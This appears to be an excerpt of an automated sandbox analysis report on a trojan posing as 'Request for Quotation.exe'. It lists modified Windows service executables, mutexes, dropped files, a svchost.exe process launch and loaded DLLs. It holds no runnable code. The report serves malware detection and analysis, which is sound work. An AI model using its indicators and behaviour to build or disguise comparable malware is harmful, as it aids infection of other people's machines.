          Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: FXSSVC.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: elevation_service.exe0.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: SensorDataService.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: snmptrap.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: Spectrum.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: ssh-agent.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: Request for Quotation.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: elevation_service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: maintenanceservice.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: msdtc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: msiexec.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: PerceptionSimulationService.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: perfhost.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: Locator.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: MsSense.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: FXSSVC.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: elevation_service.exe0.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: SensorDataService.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: snmptrap.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: Spectrum.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: ssh-agent.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: MsSense.exe.0.drBinary string: list<T> too long%user_Pictures%%user_RoamingAppData%%user_Favorites%%user_Music%%user_Desktop%%user_Contacts%%user_SkyDriveDocuments%%user_Videos%%user_SkyDrivePictures%%user_Programs%%user_PrintHood%%user_Cookies%%user_UserProgramFilesCommon%%user_SkyDrive%%user_Startup%%user_NetHood%%user_CDBurning%%user_InternetCache%%user_Downloads%%user_UserProgramFiles%%user_History%%user_Documents%%user_Recent%%user_AdminTools%%user_Templates%%user_Temp%%user_Profile%%user_LocalAppData%%user_StartMenu%%user_SentTo%%common_music%%program_filescommon%%common_programs%%systemdrive%%systemwow64%%system_public%%common_templates%%program_filesx86%%common_startmenu%%common_desktop%%common_pictures%%common_startup%%common_admin_tools%%CDIDLResources%%program_files%%common_documents%%common_video%%system_common%%programdata%\??\UNC\localhost\Admin$\Device\Mup\0:0:0:0:0:0:0:1\\Device\Mup\;LanmanRedirector\;\??\UNC\0:0:0:0:0:0:0:1\Admin$\??\UNC\127.0.0.1\Admin$\??\UNC\localhost\\\0:0:0:0:0:0:0:1\\\::1\\\?\\Device\Mup\localhost\Admin$\\\??\UNC\0:0:0:0:0:0:0:1\\Device\Mup\::1\Admin$\??\\??\UNC\::1\\\127.0.0.1\\Device\Mup\0:0:0:0:0:0:0:1\Admin$\Device\Mup\DfsClient\;\??\UNC\::1\Admin$\??\UNC\127.0.0.1\\Device\Mup\localhost\\Device\Mup\127.0.0.1\\SystemRoot\Device\Mup\::1\\Device\Mup\127.0.0.1\Admin$\\localhost\
          Source: MsSense.exe.0.drBinary string: ?\??\UNC\\Device\Mup\\?\UNC\\Device\Mup\AcquireOplockOperationSuccessCounterHashCalculationSuccessCounter[[:xdigit:]]{64}[[:xdigit:]]{32}[[:xdigit:]]{40}_%temp%%fonts%\\.\pipe\\Admin$localhostMicrosoft.muiStatisticsWilError_03%windows%%system_AllUsersProfileRoot%%system%bad allocationbad array new lengthSHELL32.dllole32.dll"
          Source: MsSense.exe.0.drBinary string: bad cast.\\tsclient\??\UNC\tsclient\\?\UNC\tsclient\Device\Mup\tsclientFailed to expand environment strings in pathFailed to expand environment strings in path after increasing buffer size\temp\systemGetAllUsersProfileDirectory failedSeSecurityPrivilegeSeRestorePrivilegeamcore\wcd\source\common\src\pathutils.cppFailed to get SACL from security descriptorNo SACL exist in the security descriptorGetModuleFileName failedCurrent machine is not downlevel server, So returning current execution path location itselfGetCurrentLibraryLocation() returned %ProgramFiles%_wsplitpath_s failed_wmakepath_s failedinvalid string positioninvalid hash bucket countSetting privilegeFailed to get process tokenFailed to lookup for privilege valueFailed to adjust token privilegesFailed to assign privilegesPrivilege was enabled before and not changedInvalid Argument Location passedSeTakeOwnershipPrivilegeFailed to set SE_TAKE_OWNERSHIP_NAME privilegeFailed to set SE_SECURITY_NAME privilegeSetting ACL on folderFailed to convert security descriptor from SDDL stringFailed to get Owner from security descriptorNo Owner info exist in the security descriptorFailed to get group sid from security descriptorNo group sid exist in the security descriptorFailed to get DACL from security descriptorNo DACL exist in the security descriptorFailed to set ACL on the folderSetting ACL on folder successfulFile path exceeds MAX_PATHCould not read the fixed file infovector<bool> too longalnumalnumalphaalphablankblankcntrlcntrldddigitdigitgraphgraphlowerlowerprintprintpunctpunctspacespacessupperupperwwxdigitxdigitFailed to get registry value size. Return default valueCould not open or create the registry path. Return default valueWrite registry valueFailed to set registry keyFailed to read registry value. Return default valueRegistry value is empty or bigger than max length. Return default valueCould not open the registry keySeBackupPrivilegeDelete registry valueFailed to delete registry valueCould not create a UNICODE_STRING to hold valueNameNew registry key was createdCould not open or create the registry keyCould not acquire or SE_RESTORE_NAME privilegeCould not acquire or SE_BACKUP_NAME privilegeCreated a new key where one should have existedCould not delete the registry keyCould not re-open the registry keyNULL%windir%\System32\wevtutil.exeCurrent machine is not downlevel server, So updatability procedure won't be appliedPerforming the version update completion activityUpdate process failedRemoving the Next Version registry keyFailed to add acl on installation pathFailed to mark as bad versionVersion update failed, so marking the version as badFailed to remove NextVersion registrySetting sense switch status registry key;Version is already marked as invalidMarking version as invalidFailed to set switch status registryChecking IsVersionUpdateInProgressCurrent machine is not downlevel server, so updatability procedure won't applyFailed to add version to Bad Version ListB{
          Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@17/28@5/2
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_0078CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,14_2_0078CBD0
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.logJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Users\user\AppData\Roaming\398ce0ec3b45a4be.binJump to behavior
          Source: C:\Windows\System32\AppVClient.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-398ce0ec3b45a4be9ea72c54-b
          Source: C:\Users\user\Desktop\Request for Quotation.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-398ce0ec3b45a4be-inf
          Source: C:\Users\user\Desktop\Request for Quotation.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-398ce0ec3b45a4be7d8e3ee9-b
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\aut4FCF.tmpJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Request for Quotation.exeReversingLabs: Detection: 81%
          Source: unknownProcess created: C:\Users\user\Desktop\Request for Quotation.exe "C:\Users\user\Desktop\Request for Quotation.exe"
          Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
          Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
          Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
          Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
          Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
          Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
          Source: unknownProcess created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
          Source: unknownProcess created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
          Source: unknownProcess created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
          Source: unknownProcess created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
          Source: unknownProcess created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
          Source: unknownProcess created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Request for Quotation.exe"
          Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Request for Quotation.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: appvpolicy.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: logoncli.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: appmanagementconfiguration.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: tapi32.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxsresm.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: ualapi.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dllJump to behavior
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: msdtctm.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcprx.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: msdtclog.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: xolehlp.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: ktmw32.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: comres.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcvsp1res.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: mtxoci.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: oci.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\System32\msdtc.exeSection loaded: fwpolicyiomgr.dllJump to behavior
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: hid.dllJump to behavior
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: devobj.dllJump to behavior
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\SensorDataService.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\SensorDataService.exeSection loaded: mfplat.dllJump to behavior
          Source: C:\Windows\System32\SensorDataService.exeSection loaded: rtworkq.dllJump to behavior
          Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.perception.dllJump to behavior
          Source: C:\Windows\System32\SensorDataService.exeSection loaded: mediafoundation.defaultperceptionprovider.dllJump to behavior
          Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.enumeration.dllJump to behavior
          Source: C:\Windows\System32\SensorDataService.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\SensorDataService.exeSection loaded: structuredquery.dllJump to behavior
          Source: C:\Windows\System32\SensorDataService.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.globalization.dllJump to behavior
          Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47mrm.dllJump to behavior
          Source: C:\Windows\System32\SensorDataService.exeSection loaded: icu.dllJump to behavior
          Source: C:\Windows\System32\SensorDataService.exeSection loaded: mswb7.dllJump to behavior
          Source: C:\Windows\System32\SensorDataService.exeSection loaded: devdispitemprovider.dllJump to behavior
          Source: C:\Windows\System32\snmptrap.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\snmptrap.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\System32\snmptrap.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\System32\snmptrap.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\System32\snmptrap.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\snmptrap.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\snmptrap.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\snmptrap.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dllJump to behavior
